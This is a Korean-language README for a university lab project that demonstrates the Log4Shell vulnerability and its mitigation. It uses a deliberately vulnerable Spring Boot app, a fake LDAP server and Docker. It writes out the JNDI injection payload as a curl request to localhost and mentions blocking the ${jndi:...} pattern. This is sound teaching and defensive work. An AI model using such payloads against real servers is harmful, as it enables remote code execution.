
Log4Shell (CVE-2021-44228) SEAS 8405용 익스플로잇 데모. 취약한 Spring Boot 앱, 가짜 LDAP 서버, Docker 설정, MITRE 매핑, 침해 대응 및 전체 화면 녹화를 포함합니다.
이 프로젝트는 Dockerized Java 웹 애플리케이션을 취약한 Log4j 2.14.1과 함께 사용하여 Log4Shell 취약점(CVE-2021-44228)의 공격 및 완화를 보여줍니다. 또한 시뮬레이션된 악성 LDAP 서버를 포함하여 JNDI 인젝션 공격 경로를 설명합니다.
공격 후, Log4j 업그레이드, 입력 검증, MITRE D3FEND 및 ATT&CK 권장 사항 적용을 통해 시스템을 강화합니다.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
애플리케이션은 다음 주소에서 실행됩니다:
http://localhost:8080
python3 ldap_server.py
다음과 같은 요청을 애플리케이션에 보냅니다:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
LDAP 서버가 요청을 수신해야 합니다 (이는 JNDI 공격을 시뮬레이션합니다).
공격 시연 후, 시스템은 다음을 통해 보호되었습니다:
${jndi:...} 패턴 차단)mitigation_report.pdf 파일 참조:
동영상이 직접 업로드되지 않은 경우, 보고서 내 링크에서 확인할 수 있습니다.
Serpil Rivas
SEAS 8405 – 사이버 보안 아키텍처
2025년 5월